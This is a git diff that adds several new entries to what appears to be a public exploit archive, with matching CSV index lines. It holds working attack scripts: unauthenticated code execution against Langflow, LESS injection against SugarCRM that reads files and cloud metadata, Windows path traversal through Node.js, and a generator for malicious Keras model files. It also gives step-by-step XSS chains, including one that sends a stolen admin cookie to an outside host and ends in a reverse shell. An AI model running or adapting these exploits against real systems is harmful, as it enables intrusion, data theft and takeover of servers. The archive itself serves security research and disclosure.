diff --git a/exploits/multiple/hardware/52363.txt b/exploits/multiple/hardware/52363.txt new file mode 100644 index 000000000..c4c85d62c --- /dev/null +++ b/exploits/multiple/hardware/52363.txt @@ -0,0 +1,16 @@ +# Title: TOTOLINK N300RB 8.54 - Command Execution +# Author: Skander BELABED - Magellan Sécurité +# Date: 07/11/2025 +# Vendor: TOTOLINK +# Product: N300RB +# Firmware version: 8.54 +# CVE: CVE-2025-52089 + +## Description: +A hidden remote support feature protected by a static secret in TOTOLINK +N300RB firmware version 8.54 allows an authenticated attacker to execute +arbitrary OS commands with root privileges. + +# Reproduce: +[href]( +https://0x09.dev/posts/toto_decouvre_une_interface_de_debug/) \ No newline at end of file diff --git a/exploits/multiple/remote/52366.txt b/exploits/multiple/remote/52366.txt new file mode 100644 index 000000000..e3335233c --- /dev/null +++ b/exploits/multiple/remote/52366.txt @@ -0,0 +1,20 @@ +# Exploit Title: MikroTik RouterOS 7.19.1 - Reflected XSS +# Google Dork: inurl:/login?dst= +# Date: 2025-07-15 +# Exploit Author: Prak Sokchea +# Vendor Homepage: https://mikrotik.com +# Software Link: https://mikrotik.com/download +# Version: RouterOS <= 7.19.1 +# Tested on: MikroTik CHR 7.19.1 +# CVE : CVE-2025-6563 + +# PoC: +# Visit the following URL while connected to the vulnerable MikroTik hotspot service: +# http:///login?dst=javascript:alert(3) + +# A reflected XSS will be triggered when the dst parameter is not properly sanitized by the server-side logic. +# This vulnerability requires user interaction (visiting the link) and may be used in phishing or redirection attacks. + +# Notes: +# This is a non-persistent reflected XSS. It is accepted due to the presence of a valid CVE (CVE-2025-6563), +# and has been acknowledged by MikroTik as a valid issue. \ No newline at end of file diff --git a/exploits/multiple/webapps/52361.txt b/exploits/multiple/webapps/52361.txt new file mode 100644 index 000000000..5baf5e55a --- /dev/null +++ b/exploits/multiple/webapps/52361.txt @@ -0,0 +1,45 @@ +# Exploit Title: PivotX v3.0.0 RC3 - Stored XSS to Remote Code Execution (RCE) +# Date: July 2025 +# Exploit Author: HayToN +# Vendor Homepage: https://github.com/pivotx +# Software Link: https://github.com/pivotx/PivotX +# Version: 3.0.0 RC3 +# Tested on: Debian 11, PHP 7.4 +# CVE : CVE-2025-52367 + +## Vulnerability Type: +Stored Cross-Site Scripting (XSS) in the "title" and "subtitle" fields of page creation. The input is not sanitized and is stored directly to disk via PHP serialize(). + +## Root Cause: +In 'modules/pages_flat.php', function 'savePage($page)' stores page data via 'saveSerialize()' without any sanitization. The stored values are later rendered in the admin panel without escaping. + +Only the 'body' and 'introduction' fields are passed through TinyMCE (which encodes HTML). 'title' and 'subtitle' are rendered as raw HTML. + +Note: If you are already admin, skip steps 1-7 +## Exploitation Steps: +1. Login as an authenticated user (normal user, no need for admin). + +2. Create a new Page via the dashboard, located at http://IP/PivotX/pivotx/index.php?page=page + +3. Create locally a JavaScript file contaning cookie stealing code. +For example: lol.js +Containing: +document.location = 'http://LOCAL_IP/bruh?c=' + document.cookie; + +4. In the "Subtitle" field, input the following payload(Be sure to change the file name as yours): + + + +5. Publish the page. + +6. When an admin views the published page in the blog, the XSS will execute in the admin’s context. + +7. Using this XSS, send a payload to steal the admin's cookies, then insert the cookies on your site. + +8. Navigate as admin, to http://IP/PivotX/pivotx/index.php?page=homeexplore, where you can edit index.php file + +9. Edit index.php file to any php file you want to gain RCE on the target, could be with reverse shell or any other method. + +10. Visit http://IP/PivotX/index.php and you should get a reverse shell :) + +# Full research - https://medium.com/@hayton1088/cve-2025-52367-stored-xss-to-rce-via-privilege-escalation-in-pivotx-cms-v3-0-0-rc-3-a1b870bcb7b3 \ No newline at end of file diff --git a/exploits/multiple/webapps/52364.py b/exploits/multiple/webapps/52364.py new file mode 100755 index 000000000..62508ad4e --- /dev/null +++ b/exploits/multiple/webapps/52364.py @@ -0,0 +1,90 @@ +#!/usr/bin/env python3 +# Exploit Title: Langflow 1.2.x - Remote Code Execution (RCE) +# Date: 2025-07-11 +# Exploit Author: Raghad Abdallah Al-syouf +# Vendor Homepage: https://github.com/logspace-ai/langflow +# Software Link: https://github.com/logspace-ai/langflow/releases +# Version: <= 1.2.x +# Tested on: Ubuntu / Docker +# CVE: CVE-2025-3248 + +# Description: +#Langflow exposes a vulnerable endpoint `/api/v1/validate/code` that improperly evaluates arbitrary Python code via the `exec()` function. An unauthenticated remote attacker can execute arbitrary system commands. + +# Usage: +#python3 cve-2025-3248.py http://target:7860 "id" + + + +import requests +import argparse +import json +from urllib.parse import urljoin +from colorama import Fore, Style, init +import random + +init(autoreset=True) +requests.packages.urllib3.disable_warnings() + +BANNER_COLORS = [Fore.MAGENTA, Fore.CYAN, Fore.LIGHTBLUE_EX] + +def show_banner(): + print(f"""{Style.BRIGHT}{random.choice(BANNER_COLORS)} +╔════════════════════════════════════════════════════╗ +║ Langflow <= 1.2.x - CVE-2025-3248 ║ +║ Remote Code Execution via exposed API ║ +║ No authentication — triggers exec() call ║ +╚════════════════════════════════════════════════════╝ + Author: Raghad Abdallah Al-syouf +{Style.RESET_ALL}""") + +class LangflowRCE: + def __init__(self, target_url, timeout=10): + self.base_url = target_url.rstrip('/') + self.session = requests.Session() + self.session.verify = False + self.session.headers = { + "User-Agent": "Langflow-RCE-Scanner", + "Content-Type": "application/json" + } + self.timeout = timeout + + def run_payload(self, command): + endpoint = urljoin(self.base_url, "/api/v1/validate/code") + payload = { + "code": ( + f"def run(cd=exec('raise Exception(__import__(\"subprocess\").check_output(\"{command}\", shell=True))')): pass" + ) + } + + print(f"{Fore.YELLOW}[+] Sending crafted payload to: {endpoint}") + try: + response = self.session.post(endpoint, data=json.dumps(payload), timeout=self.timeout) + print(f"{Fore.YELLOW}[+] HTTP {response.status_code}") + if response.status_code == 200: + try: + json_data = response.json() + err = json_data.get("function", {}).get("errors", [""])[0] + if isinstance(err, str) and err.startswith("b'"): + output = err[2:-1].encode().decode("unicode_escape").strip() + return output or "[!] No output returned." + except Exception as e: + return f"[!] Error parsing response: {e}" + return "[!] Target may not be vulnerable or is patched." + except Exception as e: + return f"[!] Request failed: {e}" + +def main(): + parser = argparse.ArgumentParser(description="PoC - CVE-2025-3248 | Langflow <= v1.2.x Unauthenticated RCE") + parser.add_argument("url", help="Target URL (e.g., http://localhost:7860)") + parser.add_argument("cmd", help="Command to execute remotely (e.g., whoami)") + args = parser.parse_args() + + show_banner() + exploit = LangflowRCE(args.url) + result = exploit.run_payload(args.cmd) + + print(f"\n{Fore.GREEN}[+] Command Output:\n{Style.RESET_ALL}{result}") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/52365.txt b/exploits/multiple/webapps/52365.txt new file mode 100644 index 000000000..fd10c251d --- /dev/null +++ b/exploits/multiple/webapps/52365.txt @@ -0,0 +1,56 @@ +# Exploit Title : SugarCRM 14.0.0 - SSRF/Code Injection +# Author: Egidio Romano aka EgiX +# Email : n0b0d13s@gmail.com + +# Software Link: https://www.sugarcrm.com +# Affected Versions: All commercial versions before 13.0.4 and 14.0.1. +# CVE Reference: CVE-2024-58258 +# Vulnerability Description: + +User input passed through GET parameters to the /css/preview REST API +endpoint is not properly sanitized before parsing it as LESS code. This can +be exploited by remote, unauthenticated attackers to inject and execute +arbitrary LESS directives. By abusing the @import LESS statement, an +attacker can trigger Server-Side Request Forgery (SSRF) or read arbitrary +local files on the web server, potentially leading to the disclosure of +sensitive information. + +# Proof of Concept: + +#!/bin/bash + +echo +echo "+----------------------------------------------------------------------+"; +echo "| SugarCRM <= 14.0.0 (css/preview) LESS Code Injection Exploit by EgiX |"; +echo "+----------------------------------------------------------------------+"; + +if [ "$#" -ne 2 ]; then + echo -ne "\nUsage.....: $0 \n" + echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' 'config.php'" + echo -ne "\nExample...: $0 'http://localhost/sugarcrm/' '/etc/passwd'" + echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://localhost:9200/_search'" + echo -ne "\nExample...: $0 'https://www.sugarcrm.com/' 'http://169.254.169.254/latest/meta-data/'\n\n" + exit 1 +fi + +urlencode() { + echo -n "$1" | xxd -p | tr -d '\n' | sed 's/../%&/g' +} + +INJECTION=$(urlencode "1; @import (inline) '$2'; @import (inline) 'data:text/plain,________';//") +RESPONSE=$(curl -ks "${1}rest/v10/css/preview?baseUrl=1¶m=${INJECTION}") + +if echo "$RESPONSE" | grep -q "________"; then + echo -e "\nOutput for '$2':\n" + echo "$RESPONSE" | sed '/________/q' | grep -v '________' + echo +else + echo -e "\nError: exploit failed!\n" + exit 2 +fi + + + +# Credits: Vulnerability discovered by Egidio Romano. +# Original Advisory: http://karmainsecurity.com/KIS-2025-04 +# Other References: https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/ \ No newline at end of file diff --git a/exploits/multiple/webapps/52367.txt b/exploits/multiple/webapps/52367.txt new file mode 100644 index 000000000..ffdb55f16 --- /dev/null +++ b/exploits/multiple/webapps/52367.txt @@ -0,0 +1,34 @@ +# Exploit Title: White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI) +# Date: 2025-07-09 +# Exploit Author: Imraan Khan (Lich-Sec) +# Vendor Homepage: https://wss.com/ +# Software Link: https://client.protop.co.za/ +# Version: v4.4.2-2024-11-27 +# Tested on: Ubuntu 22.04 / Linux +# CVE: CVE-2025-44177 +# CWE: CWE-22 - Path Traversal + +# Description: +# A Local File Inclusion vulnerability exists in White Star Software Protop v4.4.2. +# An unauthenticated remote attacker can retrieve arbitrary files via +# URL-encoded traversal sequences in the `/pt3upd/` endpoint. + +# Vulnerable Endpoint: +GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 +Host: client.protop.co.za +User-Agent: curl/8.0 +Accept: */* + +# Example curl command: +curl -i 'https://client.protop.co.za/pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd' + +# Notes: +# - Vulnerability confirmed on public instance at time of testing. +# - CVSS v3.1 Base Score: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N) +# - The vendor was notified and a fix was issued. + +# Disclosure Timeline: +# - Discovered: 2025-03-13 +# - Disclosed to vendor: 2025-03-20 +# - CVE Assigned: 2025-07-01 +# - Public Disclosure: 2025-07-09 \ No newline at end of file diff --git a/exploits/multiple/webapps/52368.txt b/exploits/multiple/webapps/52368.txt new file mode 100644 index 000000000..dd55bf31a --- /dev/null +++ b/exploits/multiple/webapps/52368.txt @@ -0,0 +1,60 @@ +# Exploit Title: WP Publications WordPress Plugin 1.2 - Stored XSS +# Google Dork: inurl:/wp-content/plugins/wp-publications/ +# Date: 2025-07-15 +# Exploit Author: Zeynalxan Quliyev +# Vendor Homepage: https://wordpress.org/plugins/wp-publications/ +# Software Link: https://downloads.wordpress.org/plugin/wp-publications.1.2.zip +# Version: <= 1.2 +# Tested on: WordPress 6.5.3 / Linux (Apache) +# CVE: CVE-2024-11605 + +## Vulnerability Details + +The WP Publications plugin for WordPress (versions <= 1.2) is vulnerable to a **Stored Cross-Site Scripting (XSS)** attack. The vulnerability exists because the plugin fails to escape filenames before outputting them in the HTML, allowing high-privileged users (such as admins) to inject arbitrary JavaScript code. + +This vulnerability is exploitable even in WordPress configurations where the `unfiltered_html` capability is disabled (e.g., multisite setups). + +--- + +## Proof of Concept (PoC) + +1. SSH into the server and navigate to the plugin directory: + ```bash + cd /var/www/html/wp-content/plugins/wp-publications/ + ``` + +2. Run the following command to create a malicious BibTeX file: + ```bash + touch ".bib" + ``` + +3. Access the plugin's BibTeX browser via the following URL: + ``` + https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib= + ``` + +4. The injected JavaScript will be executed, triggering the XSS payload: + ```javascript + alert('XSS'); + ``` + +--- + +## Impact + +* Stored XSS (JavaScript) is executed in the context of the admin panel. +* Bypasses `unfiltered_html` protection in multisite environments. +* Can be used for privilege escalation, cookie theft, or injecting malicious content. + +--- + +## Recommendation + +Update to a version of the plugin that properly escapes file names before rendering them in the output. If no update is available, disable the plugin or sanitize file inputs manually. + +--- + +## References + +* [CVE-2024-11605 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-11605) +* [WP Plugin Page](https://wordpress.org/plugins/wp-publications/) \ No newline at end of file diff --git a/exploits/nodejs/remote/52369.py b/exploits/nodejs/remote/52369.py new file mode 100755 index 000000000..f0dcf5190 --- /dev/null +++ b/exploits/nodejs/remote/52369.py @@ -0,0 +1,149 @@ +# Exploit Title : NodeJS 24.x - Path Traversal +# Exploit Author : Abdualhadi khalifa +# CVE : CVE-2025-27210 + + +import argparse +import requests +import urllib.parse +import json +import sys + +def exploit_path_traversal_precise(target_url: str, target_file: str, method: str) -> dict: + + traverse_sequence = "..\\" * 6 + normalized_target_file = target_file.replace("C:", "").lstrip("\\/") + malicious_path = f"{traverse_sequence}AUX\\..\\{normalized_target_file}" + encoded_malicious_path = urllib.parse.quote(malicious_path, safe='') + full_url = f"{target_url}/{encoded_malicious_path}" + + response_data = { + "target_url": target_url, + "target_file_attempted": target_file, + "malicious_path_sent_raw": malicious_path, + "malicious_path_sent_encoded": encoded_malicious_path, + "full_request_url": full_url, + "http_method": method, + "success": False, + "response_status_code": None, + "response_content_length": None, + "extracted_content": None, + "error_message": None + } + + try: + print(f"[*] Preparing precise Path Traversal exploit...") + print(f"[*] Malicious Path (Encoded): {encoded_malicious_path}") + print(f"[*] Request URL: {full_url}") + + if method.upper() == 'GET': + response = requests.get(full_url, timeout=15) + elif method.upper() == 'POST': + response = requests.post(f"{target_url}", params={'filename': encoded_malicious_path}, timeout=15) + else: + raise ValueError("Unsupported HTTP method. Use 'GET' or 'POST'.") + + response_data["response_status_code"] = response.status_code + response_data["response_content_length"] = len(response.content) + + if response.status_code == 200: + content = response.text + response_data["extracted_content"] = content + if target_file.lower().endswith("win.ini") and "[windows]" in content.lower(): + response_data["success"] = True + elif len(content) > 0: # For any other file, just check for non-empty content. + response_data["success"] = True + else: + response_data["error_message"] = "Received 200 OK, but content is empty or unexpected." + else: + response_data["error_message"] = f"Server responded with non-200 status code: {response.status_code}" + + except requests.exceptions.Timeout: + response_data["error_message"] = "Request timed out. Server might be slow or unresponsive." + except requests.exceptions.ConnectionError: + response_data["error_message"] = "Connection failed to target. Ensure the Node.js application is running and accessible." + except ValueError as ve: + response_data["error_message"] = str(ve) + except Exception as e: + response_data["error_message"] = f"An unexpected error occurred: {str(e)}" + + return response_data + +def main(): + + parser = argparse.ArgumentParser( + prog="CVE-2025-27210_NodeJS_Path_Traversal_Exploiter.py", + description=""" + Proof of Concept (PoC) for a precise Path Traversal vulnerability in Node.js on Windows (CVE-2025-27210). + This script leverages how Node.js functions (like path.normalize() or path.join()) + might mishandle reserved Windows device file names (e.g., CON, AUX) within Path Traversal + sequences. + """, + formatter_class=argparse.RawTextHelpFormatter + ) + parser.add_argument( + "-t", "--target", + type=str, + required=True, + help="Base URL of the vulnerable Node.js application endpoint (e.g., http://localhost:3000/files)." + ) + parser.add_argument( + "-f", "--file", + type=str, + default="C:\\Windows\\win.ini", + help="""Absolute path to the target file on the Windows system. +Examples: C:\\Windows\\win.ini, C:\\secret.txt, C:\\Users\\Public\\Documents\\important.docx + """ + ) + parser.add_argument( + "-m", "--method", + type=str, + choices=["GET", "POST"], + default="GET", + help="HTTP method for the request ('GET' or 'POST')." + ) + + args = parser.parse_args() + + # --- CLI Output Formatting --- + print("\n" + "="*70) + print(" CVE-2025-27210 Node.js Path Traversal Exploit PoC") + print("="*70) + print(f"[*] Target URL: {args.target}") + print(f"[*] Target File: {args.file}") + print(f"[*] HTTP Method: {args.method}") + print("-"*70 + "\n") + + result = exploit_path_traversal_precise(args.target, args.file, args.method) + + print("\n" + "-"*70) + print(" Exploit Results") + print("-"*70) + print(f" Request URL: {result['full_request_url']}") + print(f" Malicious Path Sent (Raw): {result['malicious_path_sent_raw']}") + print(f" Malicious Path Sent (Encoded): {result['malicious_path_sent_encoded']}") + print(f" Response Status Code: {result['response_status_code']}") + print(f" Response Content Length: {result['response_content_length']} bytes") + + if result["success"]: + print("\n [+] File successfully retrieved! Content below:") + print(" " + "="*66) + print(result["extracted_content"]) + print(" " + "="*66) + else: + print("\n [-] File retrieval failed or unexpected content received.") + if result["error_message"]: + print(f" Error: {result['error_message']}") + elif result["extracted_content"]: + print("\n Response content (partial, may indicate server error or unexpected data):") + print(" " + "-"*66) + # Truncate long content if not fully successful + print(result["extracted_content"][:1000] + "..." if len(result["extracted_content"]) > 1000 else result["extracted_content"]) + print(" " + "-"*66) + + print("\n" + "="*70) + print(" Complete") + print("="*70 + "\n") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/python/remote/52359.py b/exploits/python/remote/52359.py new file mode 100755 index 000000000..48331d689 --- /dev/null +++ b/exploits/python/remote/52359.py @@ -0,0 +1,125 @@ +#!/usr/bin/env python3 +# Exploit Title: Keras 2.15 - Remote Code Execution (RCE) +# Author: Mohammed Idrees Banyamer +# Instagram: @banyamer_security +# GitHub: https://github.com/mbanyamer +# Date: 2025-07-09 +# Tested on: Ubuntu 22.04 LTS, Python 3.10, TensorFlow/Keras <= 2.15 +# CVE: CVE-2025-1550 +# Type: Remote Code Execution (RCE) +# Platform: Python / Machine Learning (Keras) +# Author Country: Jordan +# Attack Vector: Malicious .keras file (client-side code execution via deserialization) +# Description: +# This exploit abuses insecure deserialization in Keras model loading. By embedding +# a malicious "function" object inside a .keras file (or config.json), an attacker +# can execute arbitrary system commands as soon as the model is loaded using +# `keras.models.load_model()` or `model_from_json()`. +# +# This PoC generates a .keras file which, when loaded, triggers a reverse shell or command. +# Use only in safe, sandboxed environments! + +# +# Steps of exploitation: +# 1. The attacker creates a fake Keras model using a specially crafted config.json. +# 2. The model defines a Lambda layer with a "function" deserialized from the `os.system` call. +# 3. When the victim loads the model using `load_model()`, the malicious function is executed. +# 4. Result: Arbitrary Code Execution under the user running the Python process. + +# Affected Versions: +# - Keras <= 2.15 +# - TensorFlow versions using unsafe deserialization paths (prior to April 2025 patch) +# + +# Usage: +# $ python3 exploit_cve_2025_1550.py +# [*] Loads the malicious model +# [✓] Executes the payload (e.g., creates a file in /tmp) +# + +# +# Options: +# - PAYLOAD: The command to execute upon loading (default: touch /tmp/pwned_by_keras) +# - You may change this to: reverse shell, download script, etc. + +# Example: +# $ python3 exploit_cve_2025_1550.py +# [+] Created malicious model: malicious_model.keras +# [*] Loading malicious model to trigger exploit... +# [✓] Model loaded. If vulnerable, payload should be executed. + + +import os +import json +from zipfile import ZipFile +import tempfile +import shutil + +from tensorflow.keras.models import load_model + + +PAYLOAD = "touch /tmp/pwned_by_keras" + +def create_malicious_config(): + return { + "class_name": "Functional", + "config": { + "name": "pwned_model", + "layers": [ + { + "class_name": "Lambda", + "config": { + "name": "evil_lambda", + "function": { + "class_name": "function", + "config": { + "module": "os", + "function_name": "system", + "registered_name": None + } + }, + "arguments": [PAYLOAD] + } + } + ], + "input_layers": [["evil_lambda", 0, 0]], + "output_layers": [["evil_lambda", 0, 0]] + } + } + +def build_malicious_keras(output_file="malicious_model.keras"): + tmpdir = tempfile.mkdtemp() + try: + config_path = os.path.join(tmpdir, "config.json") + with open(config_path, "w") as f: + json.dump(create_malicious_config(), f) + + metadata_path = os.path.join(tmpdir, "metadata.json") + with open(metadata_path, "w") as f: + json.dump({"keras_version": "2.15.0"}, f) + + weights_path = os.path.join(tmpdir, "model.weights.h5") + with open(weights_path, "wb") as f: + f.write(b"\x89HDF\r\n\x1a\n") # توقيع HDF5 + + with ZipFile(output_file, "w") as archive: + archive.write(config_path, arcname="config.json") + archive.write(metadata_path, arcname="metadata.json") + archive.write(weights_path, arcname="model.weights.h5") + + print(f"[+] Created malicious model: {output_file}") + finally: + shutil.rmtree(tmpdir) + + +def trigger_exploit(model_path): + print("[*] Loading malicious model to trigger exploit...") + load_model(model_path) + print("[✓] Model loaded. If vulnerable, payload should be executed.") + + + +if __name__ == "__main__": + keras_file = "malicious_model.keras" + build_malicious_keras(keras_file) + trigger_exploit(keras_file) \ No newline at end of file diff --git a/exploits/windows/local/52360.txt b/exploits/windows/local/52360.txt new file mode 100644 index 000000000..b0832cea8 --- /dev/null +++ b/exploits/windows/local/52360.txt @@ -0,0 +1,86 @@ +# Titles: Microsoft Brokering File System Windows 11 Version 22H2 - Elevation of Privilege +# Author: nu11secur1ty +# Date: 07/09/2025 +# Vendor: Microsoft +# Software: https://www.microsoft.com/en-us/windows/windows-11?r=1 +# Reference: https://portswigger.net/web-security/access-control +# CVE-2025-49677 + +## Description +This Proof of Concept (PoC) demonstrates an interactive SYSTEM shell +exploit for CVE-2025-49677. +It leverages scheduled tasks and a looping batch script running as SYSTEM +to execute arbitrary commands +with NT AUTHORITY\SYSTEM privileges and interactively returns command +output. + +# [more](https://github.com/advisories/GHSA-69q2-qmcc-6rh3) +# [Reference]( +https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49677) + +## Usage + +1. Run the Python script as Administrator on the vulnerable Windows machine. +2. The script creates a scheduled task that runs a batch script as SYSTEM +user. +3. You get an interactive prompt (`SYSTEM>`) in your Python console. +4. Type any Windows command (e.g. `whoami`, `dir`, `net user`) and see the +SYSTEM-level output. +5. Type `exit` to quit and clean up all temporary files and scheduled tasks. + +## Files + +- `PoC.py`: Python script implementing the exploit and interactive shell. +- `README.md`: This readme file. + +## Requirements + +- Python 3.x installed on Windows. +- Run the script with Administrator privileges. +- The script uses built-in Windows commands (schtasks, cmd.exe, timeout). + +## Disclaimer + +Use this PoC only in authorized environments for testing and research +purposes. +Disclosure responsibly. The author and nu11secur1ty are not responsible for +misuse. + +--- + +# Video: +[href](https://www.youtube.com/watch?v=b_TrOtCKPkg) + +# Source: +[href]( +https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-49677) + +# Buy me a coffee if you are not ashamed: +[href](https://satoshidisk.com/pay/COp6jB) + +# Time spent: +05:35:00 + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + +-- + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstorm.news/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/windows/local/52362.txt b/exploits/windows/local/52362.txt new file mode 100644 index 000000000..d7a955b20 --- /dev/null +++ b/exploits/windows/local/52362.txt @@ -0,0 +1,93 @@ +**Exploit Title : Microsoft Graphics Component Windows 11 Pro (Build 26100+) - Local Elevation of Privileges +**Author:** nu11secur1ty +**Date:** 07/11/2025 + +--- + +## Overview + +This repository contains a PowerShell script to **validate whether a +Windows 11 system is vulnerable to CVE-2025-49744**—a critical local +privilege escalation vulnerability involving the `gdi32.dll` and +`win32kfull.sys` system components. + +The script performs the following checks: + +- Windows build number validation +- Installed hotfixes, focusing on July 2025 patches including **KB5039302** +- Binary timestamp verification of critical system files +- Safe, non-destructive GDI32 API interaction test + +--- + +## PoC Validator +[href](https://raw.githubusercontent.com/nu11secur1ty/CVE-mitre/refs/heads/main/2025/CVE-2025-49744/Validate-CVE-2025-49744-PoC.ps1) + +## Usage + +1. Open **PowerShell as Administrator**. +2. Download or clone this repository to your system. +3. Run the script: + +```powershell +.\Validate-CVE-2025-49744-PoC.ps1 + +## Output + +[CVE-2025-49744 PoC Validator] by nu11secur1ty + +[*] Windows Build Number: 26100 + +[*] July 2025 Hotfixes installed: + -> KB5056579 (7/9/2025) + -> KB5039302 (7/9/2025) + +[*] Checking critical system binary timestamps: + gdi32.dll: Version 10.0.26100.4484, Last Write Time: 7/9/2025 + [✓] Binary appears patched. + +[*] Running safe GDI32 API interaction test... + [+] GDI32 CreateSolidBrush succeeded (handle: 12345) + +[✓] SYSTEM STATUS: Patched against CVE-2025-49744. +``` + +## Important Notes + +- This script does not exploit or alter the system. It only performs +validation and safe API calls. +- Keep your system regularly updated with official Microsoft patches. +- Use this tool for awareness and compliance in your security assessments. + +## License +MIT License (or specify your preferred license) + +## References + +- [CVE-2025-49744](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49744) +on MITRE +- Microsoft Security Bulletin - July 2025 +- PowerShell documentation + +## Video demo: +[href](https://www.youtube.com/watch?v=SR2pWoncfw4) + +## Buy the real exploit: +[href](https://satoshidisk.com/pay/COq10D) + +## Disclaimer +Use this tool responsibly and only on systems you own or have explicit +permission to test. + + +-- + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstorm.news/ +https://cve.mitre.org/index.html +https://cxsecurity.com/ and https://www.exploit-db.com/ +0day Exploit DataBase https://0day.today/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1a7a6906d..eb3013844 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10428,6 +10428,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 52184,exploits/multiple/hardware/52184.txt,"ABB Cylon FLXeon 9.3.4 - WebSocket Command Spawning",2025-04-11,LiquidWorm,hardware,multiple,,2025-04-11,2025-04-11,0,CVE-2024-48849,,,,, 52160,exploits/multiple/hardware/52160.py,"Cosy+ firmware 21.2s7 - Command Injection",2025-04-10,CodeB0ss,hardware,multiple,,2025-04-10,2025-04-13,0,CVE-2024-33896,,,,, 52183,exploits/multiple/hardware/52183.txt,"Netman 204 - Remote command without authentication",2025-04-11,"Parsa Rezaie Khiabanloo",hardware,multiple,,2025-04-11,2025-04-11,0,,,,,, +52363,exploits/multiple/hardware/52363.txt,"TOTOLINK N300RB 8.54 - Command Execution",2025-07-16,"Skander BELABED - Magellan Sécurité",hardware,multiple,,2025-07-16,2025-07-16,0,CVE-2025-52089,,,,,https://0x09.dev/posts/toto_decouvre_une_interface_de_debug/ 52191,exploits/multiple/hardware/52191.py,"ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass",2025-04-14,"tasos meletlidis",hardware,multiple,,2025-04-14,2025-04-14,0,,,,,, 11651,exploits/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.9p21/1.7.2p4 - Local Privilege Escalation",2010-03-07,kingcope,local,multiple,,2010-03-06,,1,,,,,, 51849,exploits/multiple/local/51849.py,"A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc",2024-03-03,"George Washington",local,multiple,,2024-03-03,2024-03-03,0,,,,,, @@ -11219,6 +11220,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 19451,exploits/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,remote,multiple,,1999-08-11,2012-06-28,1,CVE-1999-0875;OSVDB-1039,,,,,https://www.securityfocus.com/bid/578/info 51376,exploits/multiple/remote/51376.txt,"Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)",2023-04-20,nu11secur1ty,remote,multiple,,2023-04-20,2023-04-20,0,CVE-2023-28311,,,,, 20425,exploits/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",remote,multiple,,2000-11-22,2012-08-11,1,CVE-2000-1173;OSVDB-11344,,,,,https://www.securityfocus.com/bid/1977/info +52366,exploits/multiple/remote/52366.txt,"MikroTik RouterOS 7.19.1 - Reflected XSS",2025-07-16,"Prak Sokchea",remote,multiple,,2025-07-16,2025-07-16,0,CVE-2025-6563,,,,, 12114,exploits/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,cp77fk4r,remote,multiple,,2010-04-07,,1,OSVDB-63877;OSVDB-63876;OSVDB-63875;OSVDB-63874,,,,http://www.exploit-db.comWebServer-171.zip, 36839,exploits/multiple/remote/36839.py,"MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series",2015-04-27,"Onur Alanbel (BGA)",remote,multiple,,2015-04-27,2018-11-15,0,CVE-2013-0230;OSVDB-89624,,,,http://www.exploit-db.comminiupnpd-1.0.tar.gz, 3708,exploits/multiple/remote/3708.html,"MiniWebsvr 0.0.7 - Remote Directory Traversal",2007-04-11,shinnai,remote,multiple,,2007-04-10,2016-09-26,1,OSVDB-50022;CVE-2007-0919,,,,http://www.exploit-db.comminiwebsvr_0.0.7-win32.tar.gz, @@ -12130,6 +12132,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34224,exploits/multiple/webapps/34224.txt,"Kryn.cms 6.0 - Cross-Site Request Forgery / HTML Injection",2010-06-29,TurboBorland,webapps,multiple,,2010-06-29,2014-08-01,1,,,,,,https://www.securityfocus.com/bid/41229/info 52097,exploits/multiple/webapps/52097.NA,"KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)",2025-03-27,"Okan Kurtulus",webapps,multiple,,2025-03-27,2025-04-13,0,CVE-2024-46528,,,,,https://github.com/advisories/GHSA-p26r-gfgc-c47h 52125,exploits/multiple/webapps/52125.py,"Kubio AI Page Builder 2.5.1 - Local File Inclusion (LFI)",2025-04-05,4m3rr0r,webapps,multiple,,2025-04-05,2025-04-05,0,CVE-2025-2294,,,,, 